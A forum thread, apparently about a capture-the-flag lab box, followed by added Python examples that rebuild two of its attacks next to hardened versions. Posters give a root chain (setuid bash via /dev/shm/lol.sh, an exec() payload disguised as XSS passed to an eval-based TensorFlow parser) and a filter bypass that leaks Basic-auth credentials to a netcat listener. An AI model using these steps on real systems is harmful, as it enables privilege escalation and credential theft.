Posts: 7 Threads: 0 Joined: N/A
November 13, 2022 at 3:36 AM
go to http://<ip>/admin_tickets, intercept the request and change the authentication to admin:password

Posts: 22 Threads: 0 Joined: N/A
November 13, 2022 at 3:42 AM
(November 13, 2022, 03:36 AM)josh007 Wrote: go to http://<ip>/admin_tickets, intercept the request and change the authentication to admin:password
wtf! That's really messed up!! How could someone even think of doing that? pfffft! Thanks for the help, mate.

Posts: 11 Threads: 0 Joined: N/A
November 13, 2022 at 3:48 AM
I made it to the admin dashboard and messed around with some valid POST requests, but nothing. Is there a way to actually SSH with diego? I have been trying that too... Please advise when able.

Posts: 7 Threads: 0 Joined: N/A
November 13, 2022 at 3:58 AM
Blocked on the same; the tickets I send to admin don't show up.

Posts: 39 Threads: 0 Joined: N/A
November 13, 2022 at 5:04 AM
(November 13, 2022, 01:02 AM)11231123 Wrote: For root:
First get two ssh sessions.
Create the /dev/shm/lol.sh script. Something like this:

#!/bin/bash
chmod +s /bin/bash

Don't forget to make it executable.
Read the database creds from /opt/security/ml_security.py and log in to the database. Run these:

use app;
insert into escalate values ("lol","lol","lol",'hello=exec("""
import os
os.system("/dev/shm/lol.sh")
print("&ErrMsg=%3Cimg%20src=%22http://imgur.com/bTkSe.png%22%20/%3E%3CSCRIPT%3Ealert%28%22xss%22%29%3C/SCRIPT%3E")""")');

On the second session just run:

sudo /opt/security/ml_security.py

And /dev/shm/lol.sh should get run by root.
To explain it shortly:
The python script basically checks the reasons from the escalate table in the database for XSS using machine learning. If they get a score higher than .5, they get passed to the preprocess_input_exprs_arg_string function, which is vulnerable in tensorflow < 2.6.4 (the box has 2.6.3): https://github.com/advisories/GHSA-75c9-jrh4-79mc
Hence, all the stuff in the print function to make it pass the test.
How do I log in to the database?

Posts: 7 Threads: 0 Joined: N/A
November 13, 2022 at 6:30 AM
So I reset the pass and got in and viewed the admin_tickets part and saw the message; diego's creds are not working for ssh. Also tried to access tickets/102 with the diego + robert + admin auths but not working. What am I missing here?

Posts: 45 Threads: 0 Joined: N/A
November 13, 2022 at 7:01 AM
(November 13, 2022, 06:30 AM)samfisher91 Wrote: So I reset the pass and got in and viewed the admin_tickets part and saw the message; diego's creds are not working for ssh. Also tried to access tickets/102 with the diego + robert + admin auths but not working. What am I missing here?
Don't include the . at the end of the password.

Posts: 30 Threads: 0 Joined: N/A
November 13, 2022 at 9:52 AM
(November 13, 2022, 01:02 AM)11231123 Wrote: For root:
First get two ssh sessions.
Create the /dev/shm/lol.sh script. Something like this:

#!/bin/bash
chmod +s /bin/bash

Don't forget to make it executable.
Read the database creds from /opt/security/ml_security.py and log in to the database. Run these:

use app;
insert into escalate values ("lol","lol","lol",'hello=exec("""
import os
os.system("/dev/shm/lol.sh")
print("&ErrMsg=%3Cimg%20src=%22http://imgur.com/bTkSe.png%22%20/%3E%3CSCRIPT%3Ealert%28%22xss%22%29%3C/SCRIPT%3E")""")');

On the second session just run:

sudo /opt/security/ml_security.py

And /dev/shm/lol.sh should get run by root.
To explain it shortly:
The python script basically checks the reasons from the escalate table in the database for XSS using machine learning. If they get a score higher than .5, they get passed to the preprocess_input_exprs_arg_string function, which is vulnerable in tensorflow < 2.6.4 (the box has 2.6.3): https://github.com/advisories/GHSA-75c9-jrh4-79mc
Hence, all the stuff in the print function to make it pass the test.
Thanks, I'm a bit mad 'cause I had the right idea yesterday but couldn't figure out how to inject commands from the website... I connected to mysql but didn't think about injecting straight there... Also I didn't connect the dots with the ML and XSS... Ty for the help!

Posts: 23 Threads: 0 Joined: N/A
November 13, 2022 at 5:52 PM
(November 13, 2022, 03:42 AM)xGarfield Wrote:
(November 13, 2022, 03:36 AM)josh007 Wrote: go to http://<ip>/admin_tickets, intercept the request and change the authentication to admin:password
wtf! That's really messed up!! How could someone even think of doing that? pfffft! Thanks for the help, mate.
Yeah, that's a weird way to do it (doesn't make sense), however I'm pretty sure it's not the intended way. The intended way is to simply submit a ticket after resetting robert's password. There's a filter for "http" in the link field, however you can bypass it by using HTTP instead. Put a netcat listener up, and after a couple of minutes the bot clicks on the link and you can see the base64 in the Authentication header, which you can decode to get the admin password.

Posts: 8 Threads: 0 Joined: N/A
November 13, 2022 at 6:10 PM
Is the session becoming invalid so quickly realistic? Getting user was fun enough. Thanks; any tips, if I can help I will.
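The user path described in the Posts: 23 reply (the case-sensitive "http" filter on the ticket link, and the Basic credentials the bot leaks when it follows the link to a listener), recreated locally as an added example. This is not code from the box or the thread: the filter bodies are constructed stand-ins for whatever the box actually runs, the captured request is constructed to look like what a netcat listener prints, and it carries josh007's admin:password as the sample credential. The header is Authorization (the post calls it the Authentication header).

```python
"""Added example: case-sensitive link filter vs. a parsed-URL check, plus
extraction of Basic credentials from a request captured by a listener.
Everything here is constructed; the box's real filter is not on the page."""
import base64
import binascii
from urllib.parse import urlsplit


def link_allowed_vulnerable(link: str) -> bool:
    """Stand-in for the box's filter (assumption): a plain substring test for
    'http', which is case-sensitive, so 'HTTP://attacker/' passes."""
    return "http" not in link


def link_allowed_hardened(link: str) -> bool:
    """Decide on the parsed scheme/host instead of a substring. urlsplit lowercases
    the scheme, so HTTP, Http and http all become 'http'. Only site-relative
    paths are allowed; protocol-relative (//host) and backslash forms are rejected
    because browsers treat them as absolute."""
    stripped = link.strip()
    parts = urlsplit(stripped)
    if parts.scheme or parts.netloc:
        return False
    if "\\" in stripped or stripped.startswith("//"):
        return False
    return stripped.startswith("/")


# Constructed: what a listener receives when the ticket bot opens the link and
# the browser replays its Basic credentials. YWRtaW46cGFzc3dvcmQ= is admin:password.
CAPTURED_REQUEST = (
    b"GET /ticket-link HTTP/1.1\r\n"
    b"Host: 10.10.14.5:9001\r\n"
    b"User-Agent: Mozilla/5.0\r\n"
    b"Authorization: Basic YWRtaW46cGFzc3dvcmQ=\r\n"
    b"Connection: close\r\n"
    b"\r\n"
)


def basic_credentials(raw_request: bytes):
    """Return (user, password) from the first 'Authorization: Basic' header in a
    raw HTTP request, or None if there is none or it does not decode."""
    head = raw_request.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(b":")
        if not sep or name.strip().lower() != b"authorization":
            continue
        scheme, _, token = value.strip().partition(b" ")
        if scheme.lower() != b"basic":
            continue
        try:
            decoded = base64.b64decode(token.strip(), validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            return None
        user, _, password = decoded.partition(":")
        return user, password
    return None


if __name__ == "__main__":
    for candidate in ("http://10.10.14.5:9001/", "HTTP://10.10.14.5:9001/", "/tickets/102"):
        print(f"{candidate:28} weak={link_allowed_vulnerable(candidate)} "
              f"hardened={link_allowed_hardened(candidate)}")
    print("leaked credentials:", basic_credentials(CAPTURED_REQUEST))
```

The weak filter lets the upper-case scheme through exactly as the post describes; the hardened version never looks at the spelling of the scheme at all, it only accepts a site-relative path, which is the property the filter was presumably meant to enforce.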
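The root chain 11231123 describes (rows from the escalate table are scored for XSS, and anything above 0.5 is handed to an eval-based key=value parser of the kind GHSA-75c9-jrh4-79mc covers), rebuilt locally as an added example. This is not /opt/security/ml_security.py, which is not on the page, and not TensorFlow's code: the scorer is a keyword stand-in for the box's ML model, the rows are constructed in the shape of the INSERT from the thread, and the payload appends to a list instead of calling os.system("/dev/shm/lol.sh"). It also shows why the print() with the encoded <SCRIPT> is there: the whole reason string is what gets scored, so the XSS-looking text lifts the row over the threshold while the string still parses as a Python expression. The literal_eval parser beside it is the fix shape, added here for contrast.

```python
"""Added example: XSS gate -> eval-based input_exprs parser, vulnerable and
hardened. The scorer, rows and payload are constructed stand-ins."""
import ast

EXECUTED = []  # the payload appends here instead of running /dev/shm/lol.sh

# Constructed rows shaped like 11231123's INSERT; the reason is the last column.
ESCALATE_ROWS = [
    ("u1", "t1", "t2", "please raise my ticket priority"),
    ("lol", "lol", "lol",
     'hello=exec("""\n'
     'EXECUTED.append("payload ran")\n'
     'print("&ErrMsg=%3Cimg%20src=%22http://imgur.com/bTkSe.png%22%20/%3E'
     '%3CSCRIPT%3Ealert%28%22xss%22%29%3C/SCRIPT%3E")""")'),
]


def xss_score(reason: str) -> float:
    """Stand-in for the ML classifier (assumption): weighted keyword hits, capped at 1.0.
    The real model is unknown; this only reproduces 'XSS-looking text scores high'."""
    markers = ("<script", "%3cscript", "alert(", "alert%28", "onerror", "<img", "%3cimg")
    hits = sum(m in reason.lower() for m in markers)
    return min(1.0, 0.2 * hits)


def preprocess_input_exprs_arg_string_vulnerable(input_exprs_str: str) -> dict:
    """Same shape as the pre-2.6.4 TensorFlow helper: split 'k=expr;k2=expr2' and
    hand each expr to eval(), so any Python expression in a value runs."""
    input_dict = {}
    for input_raw in filter(bool, input_exprs_str.split(";")):
        if "=" not in input_raw:
            raise RuntimeError(f"{input_raw!r} is not in key=value form")
        key, expr = input_raw.split("=", 1)
        input_dict[key] = eval(expr)  # deliberately unsafe: this is the bug
    return input_dict


def preprocess_input_exprs_arg_string_safe(input_exprs_str: str) -> dict:
    """Hardened shape: ast.literal_eval accepts only Python literals, so a call
    such as exec(...) raises instead of running."""
    input_dict = {}
    for input_raw in filter(bool, input_exprs_str.split(";")):
        if "=" not in input_raw:
            raise RuntimeError(f"{input_raw!r} is not in key=value form")
        key, expr = input_raw.split("=", 1)
        try:
            input_dict[key] = ast.literal_eval(expr.strip())
        except (ValueError, SyntaxError) as exc:
            raise ValueError(f"refusing non-literal expression for {key!r}") from exc
    return input_dict


def check_escalations(rows, parser, threshold=0.5):
    """Mimic the script's loop: only reasons scored above the threshold reach the parser.
    Returns [(first column, parsed dict), ...] for the rows that got there."""
    results = []
    for row in rows:
        reason = row[-1]
        if xss_score(reason) > threshold:
            results.append((row[0], parser(reason)))
    return results


def parser_refuses(parser, input_exprs_str: str) -> bool:
    """True if the parser raises on the input, which the hardened one should."""
    try:
        parser(input_exprs_str)
    except (ValueError, RuntimeError):
        return True
    return False


if __name__ == "__main__":
    print(check_escalations(ESCALATE_ROWS, preprocess_input_exprs_arg_string_vulnerable))
    print("side effect:", EXECUTED)
    print("hardened refuses payload:",
          parser_refuses(preprocess_input_exprs_arg_string_safe, ESCALATE_ROWS[1][-1]))
```

The benign row never reaches either parser; the payload row reaches both, runs under the eval version (eval evaluates exec(...), and exec sees the module globals, so EXECUTED is updated) and is refused by the literal_eval version. On the box the same position in the flow is where os.system("/dev/shm/lol.sh") runs as root because the script is invoked with sudo.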